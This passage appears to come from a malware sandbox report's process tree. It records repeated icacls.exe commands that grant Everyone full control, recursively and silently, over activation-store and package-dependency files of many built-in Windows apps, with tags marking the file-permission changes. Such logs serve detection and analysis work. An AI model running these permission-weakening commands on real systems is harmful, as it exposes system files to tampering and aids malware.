C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
-
-
